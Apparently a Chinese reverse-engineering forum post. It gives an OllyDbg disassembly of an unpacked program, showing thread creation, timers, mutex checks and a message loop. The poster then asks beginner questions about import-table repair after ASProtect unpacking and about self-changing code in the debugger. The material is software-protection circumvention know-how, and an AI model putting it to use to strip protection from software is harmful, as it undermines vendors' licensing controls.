0040FE55 |. E8 4268FFFF call 0040669C
0040FE5A |. 8D85 A4FEFFFF lea eax, dword ptr ss:[ebp-15C]
0040FE60 |. 50 push eax
0040FE61 |. 8D85 9CFEFFFF lea eax, dword ptr ss:[ebp-164]
0040FE67 |. E8 5C62FFFF call 004060C8
0040FE6C |. 8B85 9CFEFFFF mov eax, dword ptr ss:[ebp-164]
0040FE72 |. 8D95 A0FEFFFF lea edx, dword ptr ss:[ebp-160]
0040FE78 |. E8 0F7DFFFF call 00407B8C
0040FE7D |. 8B95 A0FEFFFF mov edx, dword ptr ss:[ebp-160]
0040FE83 |. 58 pop eax
0040FE84 |. E8 173EFFFF call 00403CA0
0040FE89 |. 8B85 A4FEFFFF mov eax, dword ptr ss:[ebp-15C]
0040FE8F |. E8 0440FFFF call 00403E98
0040FE94 |. 50 push eax ; /Arg3
0040FE95 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0040FE97 |. 6A 00 push 0 ; |Arg1 = 00000000
0040FE99 |. E8 FE47FFFF call 0040469C ; \1.0040469C
0040FE9E |. 8B15 9C144100 mov edx, dword ptr ds:[41149C] ; 1.0041278C
0040FEA4 |. 8902 mov dword ptr ds:[edx], eax
0040FEA6 |. 8D95 98FEFFFF lea edx, dword ptr ss:[ebp-168]
0040FEAC |. A1 24154100 mov eax, dword ptr ds:[411524]
0040FEB1 |. 8B00 mov eax, dword ptr ds:[eax]
0040FEB3 |. E8 E467FFFF call 0040669C
0040FEB8 |. 8B85 98FEFFFF mov eax, dword ptr ss:[ebp-168]
0040FEBE |. E8 D53FFFFF call 00403E98
0040FEC3 |. 50 push eax ; /Arg3
0040FEC4 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0040FEC6 |. 6A 00 push 0 ; |Arg1 = 00000000
0040FEC8 |. E8 CF47FFFF call 0040469C ; \1.0040469C
0040FECD |. 8B15 AC144100 mov edx, dword ptr ds:[4114AC] ; 1.00412790
0040FED3 |. 8902 mov dword ptr ds:[edx], eax
0040FED5 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FEDA |. BA 04010000 mov edx, 104
0040FEDF |. E8 DC40FFFF call 00403FC0
0040FEE4 |. 68 04010000 push 104
0040FEE9 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FEEE |. 8B00 mov eax, dword ptr ds:[eax]
0040FEF0 |. E8 A33FFFFF call 00403E98
0040FEF5 |. 50 push eax ; |PathBuffer
0040FEF6 |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040FEFB |. 50 push eax ; |hModule => NULL
0040FEFC |. E8 1B48FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040FF01 |. 8BD0 mov edx, eax
0040FF03 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FF08 |. E8 B340FFFF call 00403FC0
0040FF0D |. E8 3684FFFF call 00408348
0040FF12 |. E8 9D6AFFFF call 004069B4
0040FF17 |. A1 70154100 mov eax, dword ptr ds:[411570]
0040FF1C |. 50 push eax ; /pThreadId => 1.004126D8
0040FF1D |. 6A 00 push 0 ; |CreationFlags = 0
0040FF1F |. 6A 00 push 0 ; |pThreadParm = NULL
0040FF21 |. 68 C8C74000 push 0040C7C8 ; |ThreadFunction = 1.0040C7C8
0040FF26 |. 6A 00 push 0 ; |StackSize = 0
0040FF28 |. 6A 00 push 0 ; |pSecurity = NULL
0040FF2A |. E8 8D47FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0040FF2F |. A1 78154100 mov eax, dword ptr ds:[411578]
0040FF34 |. 50 push eax ; /pThreadId => 1.004126DC
0040FF35 |. 6A 00 push 0 ; |CreationFlags = 0
0040FF37 |. 6A 00 push 0 ; |pThreadParm = NULL
0040FF39 |. 68 4CA34000 push 0040A34C ; |ThreadFunction = 1.0040A34C
0040FF3E |. 6A 00 push 0 ; |StackSize = 0
0040FF40 |. 6A 00 push 0 ; |pSecurity = NULL
0040FF42 |. E8 7547FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0040FF47 |. 68 3CEA4000 push 0040EA3C ; /Timerproc = 1.0040EA3C
0040FF4C |. 68 14050000 push 514 ; |Timeout = 1300. ms
0040FF51 |. 6A 00 push 0 ; |TimerID = 0
0040FF53 |. 6A 00 push 0 ; |hWnd = NULL
0040FF55 |. E8 C248FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF5A |. 8B15 74154100 mov edx, dword ptr ds:[411574] ; 1.00413098
0040FF60 |. 8902 mov dword ptr ds:[edx], eax
0040FF62 |. 68 F0EE4000 push 0040EEF0 ; /Timerproc = 1.0040EEF0
0040FF67 |. 68 88130000 push 1388 ; |Timeout = 5000. ms
0040FF6C |. 6A 00 push 0 ; |TimerID = 0
0040FF6E |. 6A 00 push 0 ; |hWnd = NULL
0040FF70 |. E8 A748FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF75 |. 8B15 F8144100 mov edx, dword ptr ds:[4114F8] ; 1.004130A0
0040FF7B |. 8902 mov dword ptr ds:[edx], eax
0040FF7D |. 68 08EF4000 push 0040EF08 ; /Timerproc = 1.0040EF08
0040FF82 |. 68 98080000 push 898 ; |Timeout = 2200. ms
0040FF87 |. 6A 00 push 0 ; |TimerID = 0
0040FF89 |. 6A 00 push 0 ; |hWnd = NULL
0040FF8B |. E8 8C48FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF90 |. 8B15 C4144100 mov edx, dword ptr ds:[4114C4] ; 1.004130A4
0040FF96 |. 8902 mov dword ptr ds:[edx], eax
0040FF98 |. A1 48144100 mov eax, dword ptr ds:[411448]
0040FF9D |. 8B00 mov eax, dword ptr ds:[eax]
0040FF9F |. BA A0044100 mov edx, 004104A0 ; ASCII "no"
0040FFA4 |. E8 3B3EFFFF call 00403DE4
0040FFA9 |. 74 3B je short 0040FFE6
0040FFAB |. 68 A8C44000 push 0040C4A8
0040FFB0 |. A1 48144100 mov eax, dword ptr ds:[411448]
0040FFB5 |. 8B00 mov eax, dword ptr ds:[eax]
0040FFB7 |. E8 7864FFFF call 00406434
0040FFBC |. 50 push eax ; |Timeout
0040FFBD |. 6A 00 push 0 ; |TimerID = 0
0040FFBF |. 6A 00 push 0 ; |hWnd = NULL
0040FFC1 |. E8 5648FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FFC6 |. 8B15 84154100 mov edx, dword ptr ds:[411584] ; 1.0041309C
0040FFCC |. 8902 mov dword ptr ds:[edx], eax
0040FFCE |. EB 16 jmp short 0040FFE6
0040FFD0 |> A1 6C154100 /mov eax, dword ptr ds:[41156C]
0040FFD5 |. 50 |push eax ; /pMsg => WM_NULL
0040FFD6 |. E8 4948FFFF |call <jmp.&user32.TranslateMessage> ; \TranslateMessage
0040FFDB |. A1 6C154100 |mov eax, dword ptr ds:[41156C]
0040FFE0 |. 50 |push eax ; /pMsg => WM_NULL
0040FFE1 |. E8 D647FFFF |call <jmp.&user32.DispatchMessageA> ; \DispatchMessageA
0040FFE6 |> 6A 00 push 0 ; /MsgFilterMax = 0
0040FFE8 |. 6A 00 |push 0 ; |MsgFilterMin = 0
0040FFEA |. 6A 00 |push 0 ; |hWnd = NULL
0040FFEC |. A1 6C154100 |mov eax, dword ptr ds:[41156C] ; |
0040FFF1 |. 50 |push eax ; |pMsg => 1.004126B8
0040FFF2 |. E8 E547FFFF |call <jmp.&user32.GetMessageA> ; \GetMessageA
0040FFF7 |. 85C0 |test eax, eax
0040FFF9 |.^ 75 D5 \jnz short 0040FFD0
0040FFFB |. A1 74154100 mov eax, dword ptr ds:[411574]
00410000 |. 8B00 mov eax, dword ptr ds:[eax]
00410002 |. 50 push eax ; /TimerID
00410003 |. 6A 00 push 0 ; |hWnd = NULL
00410005 |. E8 FA47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
0041000A |. A1 84154100 mov eax, dword ptr ds:[411584]
0041000F |. 8B00 mov eax, dword ptr ds:[eax]
00410011 |. 50 push eax ; /TimerID
00410012 |. 6A 00 push 0 ; |hWnd = NULL
00410014 |. E8 EB47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410019 |. A1 F8144100 mov eax, dword ptr ds:[4114F8]
0041001E |. 8B00 mov eax, dword ptr ds:[eax]
00410020 |. 50 push eax ; /TimerID
00410021 |. 6A 00 push 0 ; |hWnd = NULL
00410023 |. E8 DC47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410028 |. A1 C4144100 mov eax, dword ptr ds:[4114C4]
0041002D |. 8B00 mov eax, dword ptr ds:[eax]
0041002F |. 50 push eax ; /TimerID
00410030 |. 6A 00 push 0 ; |hWnd = NULL
00410032 |. E8 CD47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410037 |. A1 9C144100 mov eax, dword ptr ds:[41149C]
0041003C |. 8B00 mov eax, dword ptr ds:[eax]
0041003E |. 50 push eax ; /hMutex
0041003F |. E8 3047FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
00410044 |. A1 AC144100 mov eax, dword ptr ds:[4114AC]
00410049 |. 8B00 mov eax, dword ptr ds:[eax]
0041004B |. 50 push eax ; /hMutex
0041004C |. E8 2347FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
00410051 |> 8D95 94FEFFFF lea edx, dword ptr ss:[ebp-16C]
00410057 |. A1 34154100 mov eax, dword ptr ds:[411534]
0041005C |. 8B00 mov eax, dword ptr ds:[eax]
0041005E |. E8 9D63FFFF call 00406400
00410063 |. 8B85 94FEFFFF mov eax, dword ptr ss:[ebp-16C]
00410069 |. 50 push eax
0041006A |. 8D85 88FEFFFF lea eax, dword ptr ss:[ebp-178]
00410070 |. E8 5B7AFFFF call 00407AD0
00410075 |. FFB5 88FEFFFF push dword ptr ss:[ebp-178]
0041007B |. A1 3C154100 mov eax, dword ptr ds:[41153C]
00410080 |. FF30 push dword ptr ds:[eax]
00410082 |. FF37 push dword ptr ds:[edi]
00410084 |. 8D85 8CFEFFFF lea eax, dword ptr ss:[ebp-174]
0041008A |. BA 03000000 mov edx, 3
0041008F |. E8 C43CFFFF call 00403D58
00410094 |. 8B85 8CFEFFFF mov eax, dword ptr ss:[ebp-174]
0041009A |. 8D95 90FEFFFF lea edx, dword ptr ss:[ebp-170]
004100A0 |. E8 5B63FFFF call 00406400
004100A5 |. 8B95 90FEFFFF mov edx, dword ptr ss:[ebp-170]
004100AB |. 58 pop eax
004100AC |. E8 333DFFFF call 00403DE4
004100B1 |. 0F85 39020000 jnz 004102F0
004100B7 |. 6A 00 push 0 ; /Title = NULL
004100B9 |. 68 88044100 push 00410488 ; |Class = "Shell_TrayWnd"
004100BE |. E8 0147FFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
004100C3 |. 85C0 test eax, eax
004100C5 |. 0F84 25020000 je 004102F0
004100CB |. 8D85 80FEFFFF lea eax, dword ptr ss:[ebp-180]
004100D1 |. E8 F25FFFFF call 004060C8
004100D6 |. 8B85 80FEFFFF mov eax, dword ptr ss:[ebp-180]
004100DC |. 8D95 84FEFFFF lea edx, dword ptr ss:[ebp-17C]
004100E2 |. E8 A57AFFFF call 00407B8C
004100E7 |. 8D85 84FEFFFF lea eax, dword ptr ss:[ebp-17C]
004100ED |. 50 push eax
004100EE |. 8D95 7CFEFFFF lea edx, dword ptr ss:[ebp-184]
004100F4 |. A1 64144100 mov eax, dword ptr ds:[411464]
004100F9 |. 8B00 mov eax, dword ptr ds:[eax]
004100FB |. E8 9C65FFFF call 0040669C
00410100 |. 8B95 7CFEFFFF mov edx, dword ptr ss:[ebp-184]
00410106 |. 58 pop eax
00410107 |. E8 943BFFFF call 00403CA0
0041010C |. 8B85 84FEFFFF mov eax, dword ptr ss:[ebp-17C]
00410112 |. E8 813DFFFF call 00403E98
00410117 |. 50 push eax ; /MutexName
00410118 |. 6A 00 push 0 ; |Inheritable = FALSE
0041011A |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0041011F |. E8 4046FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
00410124 |. 85C0 test eax, eax
00410126 |. 0F85 C4010000 jnz 004102F0
0041012C |. 8D85 74FEFFFF lea eax, dword ptr ss:[ebp-18C]
00410132 |. E8 915FFFFF call 004060C8
00410137 |. 8B85 74FEFFFF mov eax, dword ptr ss:[ebp-18C]
0041013D |. 8D95 78FEFFFF lea edx, dword ptr ss:[ebp-188]
00410143 |. E8 447AFFFF call 00407B8C
00410148 |. 8D85 78FEFFFF lea eax, dword ptr ss:[ebp-188]
0041014E |. 50 push eax
0041014F |. 8D95 70FEFFFF lea edx, dword ptr ss:[ebp-190]
00410155 |. A1 64144100 mov eax, dword ptr ds:[411464]
0041015A |. 8B00 mov eax, dword ptr ds:[eax]
0041015C |. E8 3B65FFFF call 0040669C
00410161 |. 8B95 70FEFFFF mov edx, dword ptr ss:[ebp-190]
00410167 |. 58 pop eax
00410168 |. E8 333BFFFF call 00403CA0
0041016D |. 8B85 78FEFFFF mov eax, dword ptr ss:[ebp-188]
00410173 |. E8 203DFFFF call 00403E98
00410178 |. 50 push eax ; /Arg3
00410179 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0041017B |. 6A 00 push 0 ; |Arg1 = 00000000
0041017D |. E8 1A45FFFF call 0040469C ; \1.0040469C
00410182 |. 8B15 88154100 mov edx, dword ptr ds:[411588] ; 1.00412794
00410188 |. 8902 mov dword ptr ds:[edx], eax
0041018A |. 8D95 6CFEFFFF lea edx, dword ptr ss:[ebp-194]
00410190 |. A1 40154100 mov eax, dword ptr ds:[411540]
00410195 |. 8B00 mov eax, dword ptr ds:[eax]
00410197 |. E8 0065FFFF call 0040669C
0041019C |. 8B85 6CFEFFFF mov eax, dword ptr ss:[ebp-194]
004101A2 |. E8 F13CFFFF call 00403E98
004101A7 |. 50 push eax ; /Arg3
004101A8 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
004101AA |. 6A 00 push 0 ; |Arg1 = 00000000
004101AC |. E8 EB44FFFF call 0040469C ; \1.0040469C
004101B1 |. 8B15 20154100 mov edx, dword ptr ds:[411520] ; 1.00412798
004101B7 |. 8902 mov dword ptr ds:[edx], eax
004101B9 |. A1 34154100 mov eax, dword ptr ds:[411534]
004101BE |. BA 04010000 mov edx, 104
004101C3 |. E8 F83DFFFF call 00403FC0
004101C8 |. 68 04010000 push 104
004101CD |. A1 34154100 mov eax, dword ptr ds:[411534]
004101D2 |. 8B00 mov eax, dword ptr ds:[eax]
004101D4 |. E8 BF3CFFFF call 00403E98
004101D9 |. 50 push eax ; |PathBuffer
004101DA |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
004101DF |. 50 push eax ; |hModule => NULL
004101E0 |. E8 3745FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
004101E5 |. 8BD0 mov edx, eax
004101E7 |. A1 34154100 mov eax, dword ptr ds:[411534]
004101EC |. E8 CF3DFFFF call 00403FC0
004101F1 |. E8 5281FFFF call 00408348
004101F6 |. E8 B967FFFF call 004069B4
004101FB |. A1 70154100 mov eax, dword ptr ds:[411570]
00410200 |. 50 push eax ; /pThreadId => 1.004126D8
00410201 |. 6A 00 push 0 ; |CreationFlags = 0
00410203 |. 6A 00 push 0 ; |pThreadParm = NULL
00410205 |. 68 E0E64000 push 0040E6E0 ; |ThreadFunction = 1.0040E6E0
0041020A |. 6A 00 push 0 ; |StackSize = 0
0041020C |. 6A 00 push 0 ; |pSecurity = NULL
0041020E |. E8 A944FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
00410213 |. A1 78154100 mov eax, dword ptr ds:[411578]
00410218 |. 50 push eax ; /pThreadId => 1.004126DC
00410219 |. 6A 00 push 0 ; |CreationFlags = 0
0041021B |. 6A 00 push 0 ; |pThreadParm = NULL
0041021D |. 68 D8BD4000 push 0040BDD8 ; |ThreadFunction = 1.0040BDD8
00410222 |. 6A 00 push 0 ; |StackSize = 0
00410224 |. 6A 00 push 0 ; |pSecurity = NULL
00410226 |. E8 9144FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0041022B |. 68 A0EC4000 push 0040ECA0 ; /Timerproc = 1.0040ECA0
00410230 |. 68 14050000 push 514 ; |Timeout = 1300. ms
00410235 |. 6A 00 push 0 ; |TimerID = 0
00410237 |. 6A 00 push 0 ; |hWnd = NULL
00410239 |. E8 DE45FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0041023E |. 8B15 74154100 mov edx, dword ptr ds:[411574] ; 1.00413098
00410244 |. 8902 mov dword ptr ds:[edx], eax
00410246 |. 68 E4EE4000 push 0040EEE4 ; /Timerproc = 1.0040EEE4
0041024B |. 68 70170000 push 1770 ; |Timeout = 6000. ms
00410250 |. 6A 00 push 0 ; |TimerID = 0
00410252 |. 6A 00 push 0 ; |hWnd = NULL
00410254 |. E8 C345FFFF call <jmp.&user32.SetTimer> ; \SetTimer
00410259 |. 8B15 84154100 mov edx, dword ptr ds:[411584] ; 1.0041309C
0041025F |. 8902 mov dword ptr ds:[edx], eax
00410261 |. 68 0CF24000 push 0040F20C ; /Timerproc = 1.0040F20C
00410266 |. 68 E8030000 push 3E8 ; |Timeout = 1000. ms
0041026B |. 6A 00 push 0 ; |TimerID = 0
0041026D |. 6A 00 push 0 ; |hWnd = NULL
0041026F |. E8 A845FFFF call <jmp.&user32.SetTimer> ; \SetTimer
00410274 |. 8B15 F8144100 mov edx, dword ptr ds:[4114F8] ; 1.004130A0
0041027A |. 8902 mov dword ptr ds:[edx], eax
0041027C |. EB 16 jmp short 00410294
0041027E |> A1 6C154100 /mov eax, dword ptr ds:[41156C]
00410283 |. 50 |push eax ; /pMsg => WM_NULL
00410284 |. E8 9B45FFFF |call <jmp.&user32.TranslateMessage> ; \TranslateMessage
00410289 |. A1 6C154100 |mov eax, dword ptr ds:[41156C]
0041028E |. 50 |push eax ; /pMsg => WM_NULL
0041028F |. E8 2845FFFF |call <jmp.&user32.DispatchMessageA> ; \DispatchMessageA
00410294 |> 6A 00 push 0 ; /MsgFilterMax = 0
00410296 |. 6A 00 |push 0 ; |MsgFilterMin = 0
00410298 |. 6A 00 |push 0 ; |hWnd = NULL
0041029A |. A1 6C154100 |mov eax, dword ptr ds:[41156C] ; |
0041029F |. 50 |push eax ; |pMsg => 1.004126B8
004102A0 |. E8 3745FFFF |call <jmp.&user32.GetMessageA> ; \GetMessageA
004102A5 |. 85C0 |test eax, eax
004102A7 |.^ 75 D5 \jnz short 0041027E
004102A9 |. A1 74154100 mov eax, dword ptr ds:[411574]
004102AE |. 8B00 mov eax, dword ptr ds:[eax]
004102B0 |. 50 push eax ; /TimerID
004102B1 |. 6A 00 push 0 ; |hWnd = NULL
004102B3 |. E8 4C45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102B8 |. A1 84154100 mov eax, dword ptr ds:[411584]
004102BD |. 8B00 mov eax, dword ptr ds:[eax]
004102BF |. 50 push eax ; /TimerID
004102C0 |. 6A 00 push 0 ; |hWnd = NULL
004102C2 |. E8 3D45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102C7 |. A1 F8144100 mov eax, dword ptr ds:[4114F8]
004102CC |. 8B00 mov eax, dword ptr ds:[eax]
004102CE |. 50 push eax ; /TimerID
004102CF |. 6A 00 push 0 ; |hWnd = NULL
004102D1 |. E8 2E45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102D6 |. A1 88154100 mov eax, dword ptr ds:[411588]
004102DB |. 8B00 mov eax, dword ptr ds:[eax]
004102DD |. 50 push eax ; /hMutex
004102DE |. E8 9144FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
004102E3 |. A1 20154100 mov eax, dword ptr ds:[411520]
004102E8 |. 8B00 mov eax, dword ptr ds:[eax]
004102EA |. 50 push eax ; /hMutex
004102EB |. E8 8444FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
004102F0 |> 33C0 xor eax, eax
004102F2 |. 5A pop edx
004102F3 |. 59 pop ecx
004102F4 |. 59 pop ecx
004102F5 |. 64:8910 mov dword ptr fs:[eax], edx
004102F8 |. 68 25034100 push 00410325
004102FD |> 8D85 6CFEFFFF lea eax, dword ptr ss:[ebp-194]
00410303 |. BA 39000000 mov edx, 39
00410308 |. E8 2B38FFFF call 00403B38
0041030D |. 8D85 78FFFFFF lea eax, dword ptr ss:[ebp-88]
00410313 |. BA 1E000000 mov edx, 1E
00410318 |. E8 1B38FFFF call 00403B38
0041031D \. C3 retn
这么啰嗦希望大侠们不要嫌麻烦。
在这里有几个问题想请教路过的大侠们,
1、aspr脱壳后是要修复的,手动的,用脚本的,可这个好像并不用,是不是因为里面还有一层壳已经把iat加密了。
2、在aspr中总是有一些代码跳到一个在od中看不到的指令去,可一跳过去就指令就出现了,
但只要滚动一下窗口,马上就又变了,这是为什么?
以上是看别人精华,边跟踪时遇到的问题,不知是不是问的很低级,本人水平太菜。
让大侠们见笑了。
现在已经夜里两点了,等等再慢慢分析它的工作流程啦,先歇了。
也耽搁看小菜贴子的大侠的宝贵时间了。
赞赏
赞赏
雪币:
留言:
